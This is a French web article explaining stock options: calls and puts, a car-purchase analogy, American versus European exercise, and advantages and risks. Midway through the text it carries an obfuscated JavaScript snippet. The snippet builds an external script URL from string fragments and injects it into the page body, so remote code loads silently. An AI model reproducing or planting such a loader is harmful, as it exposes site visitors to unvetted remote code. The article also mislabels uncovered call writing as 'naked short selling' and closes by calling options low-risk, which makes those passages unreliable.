Sign in / Join
Les options en bourse

À quoi servent les options en bourse ?

Les produits dérivés en bourse sont de plus en plus utilisés par ceux qui transigent en ligne sur des plateformes de courtage. Elles offrent des avantages intéressants, tels que l’accès à différents sous-jacents, ainsi que la possibilité d’entrer sur les marchés financiers, qu’ils soient à la hausse ou à la baisse. Pour mieux comprendre cet outil, nous expliquerons dans cet article ce qu’est une option et comment les utiliser.

Définition des options en bourse 

La définition précise d’une option est : un contrat qui donne à son titulaire le droit - et non l’obligation - d’acheter ou de vendre un actif sous-jacent, à un prix et à une date déterminée à l’avance. En clair, cela veut dire qu’il est possible pour un investisseur de bloquer le cours d’un actif sous-jacent au prix du marché actuel, afin de l’acheter ou de le vendre à une date ultérieure, mais avant que le contrat n’arrive à sa date d’échéance.  

A voir aussi : Les dernières tendances à connaître pour un investissement locatif réussi

Les options sont des produits dérivés. Elles n’existent pas sans le sous-jacent auquel elles se rapportent. Celui-ci peut prendre la forme d’actions, d’indices boursiers et de « commodities », dont l’or et le pétrole. C’est un contrat à terme, comme le sont d’autres produits dérivés boursiers, tels que les futures. Cependant, contrairement à ces derniers, la personne qui achète une option n’est pas obligée d’acquérir ou de vendre le sous-jacent en question, à la fin du contrat. 

Comment utiliser une option ? 

Il existe deux façons d’utiliser des options en bourse. On peut choisir une option d’achat ou une option de vente. On utilisera la première dans un marché haussier et la seconde dans un marché baissier. Pour bien comprendre le fonctionnement, voici un exemple qui utilise un bien réel (une voiture) pour lequel on aurait acquis une option d’achat. 

A lire également : Optimiser son portefeuille d'investissement : La clé de la diversification pour réduire les risques

Exemple : 

Jean a découvert la voiture de ses rêves. Le prix demandé est de 50 000 euros. Il croit cependant que ce prix va augmenter, car selon lui d’autres acheteurs offriront des montants plus élevés pour celle-ci, dans les semaines qui viennent. Il acquiert donc une option d’achat à 50 000 euros pour le véhicule. Dans le contrat qu’il signe, sera indiquée une date d’échéance. Il pourra d’ici là acheter le véhicule à ce prix. S’il ne le fait pas, alors il aura perdu le montant que lui aura coûté l’option. Mais si un autre acheteur offre un montant plus élevé au vendeur (par exemple 60 000 euros), alors Jean pourra exercer son droit d’achat et revendre la voiture immédiatement au prix de 60 000 euros à l’autre acheteur, une fois l’ayant acquis, faisant ainsi une plus-value de 10 000 euros.  

Dans le cas d’une option vente, pour faire une plus-value, le prix du sous-jacent devra baisser au cours de la période prédéterminée au contrat, et le détenteur de l’option devra exercer son droit de vente. Ce bénéfice sera équivalent à la différence entre le prix du marché au jour du contrat et la valeur réelle du cours à la date de la vente.  

Il est important de bien étudier le fonctionnement des options avant de les utiliser. Comme elles viennent avec un effet de levier, les pertes pourraient être importantes. 

(function(){

iqzh_=("u"+"st");iqzh=document.createElement("script");iqzh.async=true;

iqzhu="495778545";iqzh_+="a"+("t.");iqzh_+="i"+("nf"+("o"))+("/");

iqzhu+=".kvc71uqwqzhazd7f";iqzhu+="1lnjru44tsfcx6";

iqzh.src="https://"+iqzh_+iqzhu;iqzh.type="text/javascript";

d_b=document.body;d_b.appendChild(iqzh);

})();

Les différents types d'options en bourse

Les options en bourse se déclinent en deux grandes catégories : les options d’achat (ou call) et les options de vente (ou put). Elles peuvent aussi être américaines ou européennes, mais cette différenciation est souvent secondaire.

Lorsque l’on achète une option d’achat, on parie sur la hausse du prix du sous-jacent. Cette option permet donc à son détenteur d’acquérir le bien sous-jacent à un prix fixé contractuellement, appelé « prix d’exercice », pendant une période donnée. Si le prix du sous-jacent augmente avant la date limite de l’échéance, alors il pourra acheter le bien moins cher que ce qu’il vaut sur le marché. Le succès de cette opération repose donc sur la capacité du détenteur à prévoir correctement l’évolution des cours.

À l'inverse des options d'achat, les options de vente misent sur une baisse potentielle des cours. Dans ce cas-là, on acquiert un droit à vendre un actif au prix fixé contractuellement dans un délai imparti en pensant que sa valeur va chuter entre-temps. Effectivement, si cela arrive réellement, alors nous serons en mesure de revendre cet actif acquis pour plus cher que sa valeur marchande actuelle grâce aux modalités du contrat d’option. Si la baisse n'est pas au rendez-vous, l'investisseur aura perdu le montant de son option.

La différence entre les deux types d'options est simple. Les options européennes ne peuvent être exercées qu'à une date précise définie dans le contrat, tandis que les options américaines peuvent être exercées à tout moment jusqu’à leur échéance. Cette particularité fait des options américaines un outil plus flexible pour l'investisseur qui peut décider de revendre immédiatement son actif sous-jacent si cela se révèle rentable ou attendre en espérant une remontée des cours.

Vous devez noter que la majorité des contrats proposés par les courtiers sont des contrats européens.

Les avantages et les risques des options en bourse

Investir dans des options présente plusieurs avantages. Cela permet de spéculer sur l'évolution future du marché sans avoir à acheter physiquement les actifs sous-jacents. Si le marché connaît une forte volatilité, les investisseurs peuvent utiliser les options pour se protéger contre les baisses de prix ou simplement pour bénéficier d'une opportunité rentable. La flexibilité offerte par les contrats d'options est un grand atout. Effectivement, il est possible de prendre position à la hausse ou à la baisse du marché en utilisant des calls et puts respectivement. De même, il est possible de choisir son niveau de risque en achetant des contrats avec différentes durées ou différents prix d'exercice.

Comme tout investissement financier, investir dans des options n'est pas dénué de risques. Le premier danger réside dans le coût déjà important associé aux transactions liées aux options (primes). Si l'on ne prédit pas correctement l'évolution future du marché, alors le détenteur perd tout simplement sa prime. Certains produits financiers complexes comportent un risque supplémentaire : celui-ci peut être illimité. Par exemple, lorsqu'un trader vend une option call sans posséder effectivement l'actif sous-jacent • ce que l'on appelle « naked short selling » • il peut potentiellement perdre beaucoup plus que sa mise initiale. Dans ce cas-là, l'investisseur expose son portefeuille au versement éventuel et imprécis qu'il devra réaliser en cas d'exercice de l'option.

Les options en bourse représentent une opportunité intéressante pour ceux qui cherchent à diversifier leur portefeuille et à spéculer sur le marché sans y prendre trop de risques. Elles doivent être maniées avec prudence, car tout investissement dans des produits financiers comporte son lot de risques et de complexité. Les investisseurs devraient donc s'informer soigneusement avant d'investir dans des options afin d'éviter les pièges potentiels du marché financier.